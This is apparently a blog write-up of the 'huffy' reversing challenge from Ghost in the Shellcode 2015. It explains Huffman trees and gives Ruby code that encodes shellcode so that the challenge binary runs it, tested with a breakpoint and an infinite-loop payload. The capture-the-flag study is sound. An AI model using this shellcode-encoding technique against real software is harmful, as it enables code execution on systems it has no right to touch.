Welcome to my fourth and final writeup from Ghost in the Shellcode 2015! This one is about the one and only reversing level, called “huffy”, that was released right near the end.
Unfortunately, while I thought I was solving it a half hour before the game ended, I had messed up some timezones and was finishing it a half hour after the game ended. So I didn’t do the final exploitation step.
At any rate, I solved the hard part, so I’ll go over the solution!
Huffman Trees
Since the level was called “huffy”, and I recently solved a level involving Huffman Trees in the Defcon qualifiers, my immediate thought was a Huffman Tree.
For those who don’t know, a Huffman Tree is a fairly simple data structure used for data compression. The tree is constructed by reading the input and building a tree where the most common characters are near the top, and the least common are near the bottom.
To compress data, it traverses the tree to generate the encoded bits (left = 0, right = 1). The closer to the top something is, the less bits it encodes to. It’s also a “prefix code”, which is a really neat property that means that no encoded bit string is a prefix of another one (in other words, when you’re reading bits, you instantly know when you’re done decoding one character).
For example, if you had a Huffman Tree that looked like:
9 / \ 4 5 (o) / \ d(3) g(1)
You know that it was generated from text with 9 characters. 5 of the characters were ‘o’, 3 of the characters were ‘d’, and 1 of the characters were ‘g’.
When you use it to compress data, you might compress “dog” like:
- d = 00 (left left)
- o = 1 (right)
- g = 01 (left right)
Therefore, “dog” would encode to the bits “00101”.
If you saw the string of bits “01100”, you could follow the tree: left right (g) right (o) left left (d) and get the string “god”.
If there are equal numbers of each character in a string, and the number of unique characters is a power of 2, you wind up with a balanced tree.. for example, the string “aaabbbcccddd” would have the huffman tree:
12 / \ 6 6 / \ / \ a b c d
And the string “abcd” will be encoded “00011011”.
That property is going to be important. :)
Understanding the program
When you run the program it prompts for input from stdin. If you give it input, it outputs a whole bunch of junk (although the output makes it a whole lot easier!).
Here’s an example:
$ echo 'this is a test string' | ./huffy CWD: /home/ron/gits2015/huffy Nibble Frequency ------ --------- 0 0.113636 1 0.022727 2 0.113636 3 0.090909 4 0.090909 5 0.022727 6 0.181818 7 0.227273 8 0.022727 9 0.068182 a 0.022727 b 0.000000 c 0.000000 d 0.000000 e 0.022727 f 0.000000 Read 22 bytes Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.022727 Two lowest frequencies: 0.022727 and 0.022727 Two lowest frequencies: 0.022727 and 0.022727 Two lowest frequencies: 0.022727 and 0.045455 Two lowest frequencies: 0.045455 and 0.068182 Two lowest frequencies: 0.068182 and 0.090909 Two lowest frequencies: 0.090909 and 0.113636 Two lowest frequencies: 0.113636 and 0.113636 Two lowest frequencies: 0.159091 and 0.181818 Two lowest frequencies: 0.204545 and 0.227273 Two lowest frequencies: 0.227273 and 0.227273 Two lowest frequencies: 0.340909 and 0.431818 Two lowest frequencies: 0.454545 and 0.454545 Two lowest frequencies: 0.772727 and 0.909091 Breaking! 0 --0--> 0x9863348 --1--> 0x9863390 --1--> 0x98633c0 --1--> 0x98633d8 1 --0--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 2 --1--> 0x9863348 --1--> 0x9863390 --1--> 0x98633c0 --1--> 0x98633d8 3 --1--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 4 --0--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 5 --0--> 0x98632d0 --0--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 6 --1--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 7 --1--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 8 --0--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 9 --1--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 a --1--> 0x98632d0 --0--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 b --0--> 0x9863258 --0--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 c --1--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 d --1--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 e --1--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 f --1--> 0x9863258 --0--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 Encoding input... ASCII Encoded: 011010000100000001010110110001111111100010101101100011111111000100001011111110011010000101010001100010110100111111100110001011010001111110010101100100001110010111110010101 Binary Encoded: h@V????Q?O?-???? Executing encoded input... Segmentation fault
It took me a little bit of time to see what’s going on, but once you get it, it’s pretty straight forward!
The first part is giving a frequency analysis of each nibble (a nibble being one hex character, or half of a byte). That tells me that it’s compressing it via nibbles. Then it gives a frequency analysis of the input—I didn’t worry too much about that—then it shows the encodings for each of the 16 possible nibbles.
After it encodes them, it takes those bits and converts them to a long binary string, then tries to run it.
So to summarize: you have to come up with some data that, when compressed nibble-by-nibble with Huffman encoding, will turn into something executable!
Cleaning up the output
To make my life easier, I thought I’d use a bit of shell-fu to clean up the output so I can better understand what’s going on:
$ echo 'this is a test string' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//'
Which produces the output:
[...] 0 0111 1 010000 2 1111 3 1000 4 0010 5 001010 6 100 7 110 8 00000 9 11010 a 101010 b 0000110000 c 10110000 d 100110000 e 1110000 f 1000110000 Encoding input... ASCII Encoded: 011010000100000001010110110001111111100010101101100011111111000100001011111110011010000101010001100010110100111111100110001011010001111110010101100100001110010111110010101
If you try to give it “AAAA”, you wind up with this table:
$ echo 'AAAA' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//' [...] 0 0101 1 0 2 0000000000001101 3 101101 4 11 5 1001101 6 10001101 7 100001101 8 1000001101 9 10000001101 a 11101 b 100000001101 c 1000000001101 d 10000000001101 e 100000000001101 f 1000000000001101 Encoding input... ASCII Encoded: 110110110110101010111 Binary Encoded:
You probably know that AAAA = “41414141”, so ‘4’ and ‘1’ are the most common nibbles. That’s borne out in the table, too, with ‘4’ being encoded as ‘11’ and ‘1’ being encoded as ‘0’. We also expect to see a newline at the end - “\x0a” - so the ‘0’ and ‘a’ should also be encoded there.
If we break apart the characters, we see this string:
ASCII Encoded: 11 0 11 0 11 0 11 0 1010 10111
One thing to note is that everything is going to be backwards from how you see it on the table! 11 and 0 don’t actually matter, but 1010 = 0101 = ‘0’, and 10111 = 11101 = ‘a’. I honestly didn’t notice that during the actual game, though, I worked around that problem in a creative way. :)
Balancing it out
Remember I mentioned earlier that if you have a balanced tree with a power-of-two number of nodes, all characters are encoded to the same number of bits? Well, it turns out that there are 16 different nibbles, so if you have an even number of each nibble in your input string, they each encode to 4 bits:
$ echo -ne '\x01\x23\x45\x67\x89\xab\xcd\xef' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//' 0 0000 1 0001 2 0011 3 0010 4 0110 5 0111 6 0101 7 0100 8 1100 9 1101 a 1111 b 1110 c 1010 d 1011 e 1001 f 1000
And not only do they each encode to 4 bits, every possible 4-bit value is there, too!
Exploit
The exploit now is just a matter of…
- Figuring out which nibbles encode to which bits
- Writing those nibbles out as shellcode
- Padding the shellcode till you have the same number of each nibble
That’s all pretty straight forward! Check out my full exploit, or piece it together from the snippits below :)
First, create a table (I did this by hand):
@@table = { "0000" => 0x0, "0001" => 0x1, "0011" => 0x2, "0010" => 0x3, "0110" => 0x4, "0111" => 0x5, "0101" => 0x6, "0100" => 0x7, "1100" => 0x8, "1101" => 0x9, "1111" => 0xa, "1110" => 0xb, "1010" => 0xc, "1011" => 0xd, "1001" => 0xe, "1000" => 0xf, }
Then encode the shellcode:
def encode_nibble(b) binary = b.to_s(2).rjust(4, '0') puts("Looking up %s... => %x" % [binary, @@table[binary]]) return @@table[binary] end @@hist = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ] #shellcode = "\xeb\xfe" #shellcode = "\xcd\x03" shellcode = "hello world, this is my shellcode!" shellcode.each_byte do |b| n1 = b >> 4 n2 = b & 0x0f puts("n1 = %x" % n1) puts("n2 = %x" % n2) @@hist[n1] += 1 @@hist[n2] += 1 out += ((encode_nibble(n1) << 4) | (encode_nibble(n2) & 0x0F)).chr end
Notice that I maintain a histogram, that makes the final step easier, padding the string as needed:
def get_padding() result = "" max = @@hist.max needed_nibbles = [] 0.upto(@@hist.length - 1) do |i| needed_nibbles << [i] * (max - @@hist[i]) needed_nibbles.flatten! end if((needed_nibbles.length % 2) != 0) puts("We need an odd number of nibbles! Add some NOPs or something :(") exit end 0.step(needed_nibbles.length - 1, 2) do |i| n1 = needed_nibbles[i] n2 = needed_nibbles[i+1] result += ((encode_nibble(n1) << 4) | (encode_nibble(n2) & 0x0f)).chr end return result end
And now “out” should contain a bunch of nibbles that will map to shellcode! Should!
Finally, we output it:
def output(str) print "echo -ne '" str.bytes.each do |b| print("\\x%02x" % b) end puts("' > in; ./huffy < in") end
Hacking around a bug
Did you notice what I did wrong? I made a big mistake, and in the heat of the contest I didn’t have time to fix it properly. When I tried to encode “hello world, this is my shellcode!”, I get:
echo -ne '\x4f\x46\x48\x48\x4a\x30\x55\x4a\x53\x48\x47\x38\x30\x57\x4f\x4e\x52\x30\x4e\x52\x30\x49\x5e\x30\x52\x4f\x46\x48\x48\x42\x4a\x47\x46\x31\x00\x00\x00\x00\x00\x00\x00\x01\x11\x11\x11\x11\x11\x11\x11\x11\x11\x33\x33\x33\x33\x33\x33\x22\x22\x22\x22\x22\x22\x22\x22\x77\x77\x77\x77\x77\x77\x77\x77\x76\x66\x66\x66\x66\x66\x66\x66\x66\x55\x55\x55\x55\x55\x55\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xee\xee\xee\xee\xee\xee\xee\xee\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\x88\x88\x88\x88\x88\x88\x88\x99\x99\x99\x99\x99\x99\x99\x99\x99\x9b\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xba\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' > in; ./huffy < in
Which works out to:
ajcco@?o?cbC@?ai?@i?@k?@?ajcclobj?????????DDDDDD????????""""""""*??????????????????????UUUUUUUUUU??????????3333333??????????wwwwwwwww????????
That’s not my string! What’s the deal?
But notice the string starts with “ajcco” - that kidna looks like “hello”. And the 4-bits-per-character thing is holding up, we can see:
0 0000 1 0001 2 0011 3 0010 4 0110 5 0111 6 0101 7 0100 8 1100 9 1101 a 1111 b 1110 c 1010 d 1011 e 1001 f 1000
So it’s kinda working! Kinnnnnda!
To work on this, I tried the shellcode
"\x01\x23\x45\x67\x89\xab\xcd\xef"
and determined that it encoded to: “0000100001001100001010100110111000011001010111010011101101111111”, which is, in hex:
"\x08\x4c\x3a\x6e\x19\x5d\x3b\x7f"
Or, to list the nibbles:
0000 1000 0100 1100 0010 1010 0110 1110 0001 1001 0101 1101 0011 1011 0111 1111
If I was paying more attention, I would have noticed the obvious problem: they’re backwards!!!
In my rush to get the level done, I didn’t notice that every nibble’s bits were exactly backwards (1000 instead of 0001, 0100 instead of 0010, etc etc)
While I didn’t notice the problem, I did notice that everything was consistently wrong. So I did this:
hack_table = { 0x02 => 0x08, 0x0d => 0x09, 0x00 => 0x00, 0x08 => 0x02, 0x0f => 0x01, 0x07 => 0x03, 0x03 => 0x07, 0x0c => 0x06, 0x04 => 0x04, 0x0b => 0x05, 0x01 => 0x0f, 0x0e => 0x0e, 0x06 => 0x0c, 0x09 => 0x0d, 0x05 => 0x0b, 0x0a => 0x0a } hack_out = "" out.bytes.each do |b| n1 = hack_table[b >> 4] n2 = hack_table[b & 0x0f] hack_out += ((n1 << 4) | (n2 & 0x000f)).chr end output(hack_out)
And ran it with the original test shellcode:
$ ruby ./sploit.rb echo -ne '\x41\x4c\x42\x42\x4a\x70\xbb\x4a\xb7\x42\x43\x72\x70\xb3\x41\x4e\xb8\x70\x4e\xb8\x70\x4d\xbe\x70\xb8\x41\x4c\x42\x42\x48\x4a\x43\x4c\x7f\x00\x00\x00\x00\x00\x00\x00\x0f\xff\xff\xff\xff\xff\xff\xff\xff\xff\x77\x77\x77\x77\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x33\x33\x33\x33\x33\x33\x33\x33\x3c\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xbb\xbb\xbb\xbb\xbb\xbb\x11\x11\x11\x11\x11\x11\x11\x11\x1e\xee\xee\xee\xee\xee\xee\xee\xee\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x22\x22\x22\x22\x22\x22\x22\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xd5\x55\x55\x55\x55\x55\x55\x55\x55\x55\x5a\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' > in; ./huffy < in
Then run the code I got:
$ echo -ne '\x41\x4c\x42\x42\x4a\x70\xbb\x4a\xb7\x42\x43\x72\x70\xb3\x41\x4e\xb8\x70\x4e\xb8\x70\x4d\xbe\x70\xb8\x41\x4c\x42\x42\x48\x4a\x43\x4c\x7f\x00\x00\x00\x00\x00\x00\x00\x0f\xff\xff\xff\xff\xff\xff\xff\xff\xff\x77\x77\x77\x77\x77\x77\x88\x88\x88\x88\x88\x88\x88\x88\x33\x33\x33\x33\x33\x33\x33\x33\x3c\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xbb\xbb\xbb\xbb\xbb\xbb\x11\x11\x11\x11\x11\x11\x11\x11\x1e\xee\xee\xee\xee\xee\xee\xee\xee\x66\x66\x66\x66\x66\x66\x66\x66\x66\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x22\x22\x22\x22\x22\x22\x22\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xd5\x55\x55\x55\x55\x55\x55\x55\x55\x55\x5a\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa' > in; ./huffy < in
Binary Encoded:
hello world, this is my shellcode!""""""33333333DDDDDDDDEUUUUUUUUwwwwww???????????????????????????????????????????????????????????????????????? Executing encoded input... Segmentation fault
That’s better! It decoded it properly thanks to my little hack! Not let’s try my two favourite test strings, “\xcd\x03” (debug breakpoint, can also use “\xcc”) and “\xeb\xfe” (infinite loop):
$ ruby ./sploit.rb echo -ne '\x2d\x08\xf7\x3c\x4b\x1e\x69\x5a' > in; ./huffy < in $ echo -ne '\x2d\x08\xf7\x3c\x4b\x1e\x69\x5a' > in; ./huffy < in Binary Encoded: ?Eg??? Executing encoded input... Trace/breakpoint trap $ ruby ./sploit.rb echo -ne '\x59\xa5\x00\xff\x77\x88\x33\xcc\x44\xbb\x11\xee\x66\x92\x2d\xda' > in; ./huffy < in $ echo -ne '\x59\xa5\x00\xff\x77\x88\x33\xcc\x44\xbb\x11\xee\x66\x92\x2d\xda' > in; ./huffy < in Binary Encoded: ??"3DUfw?????? Executing encoded input... [...infinite loop...]
At this point, I had run out of time (damn you timezones!) and didn’t finish up.
Summary
This was, as I mentioned, a pretty straight forward Huffman-Tree level.
It compresses your input, nibble-by-nibble, and runs the result.
I gave it some input to ensure the tree is balanced, where each nibble produces 4 bits, then we encoded the shellcode as such.
When I realized I was getting the wrong output, rather than reversing the bit strings, which I hadn’t realize were backwards until just now, I made a little table to translate them correctly.
Then we encode the shellcode, and we win!
The last step would be to find appropriate shellcode, pad the message to always be 1024 nibbles (like the server wants), and send it off!
Comments
Join the conversation on this Mastodon post (replies will appear below)!
Loading comments...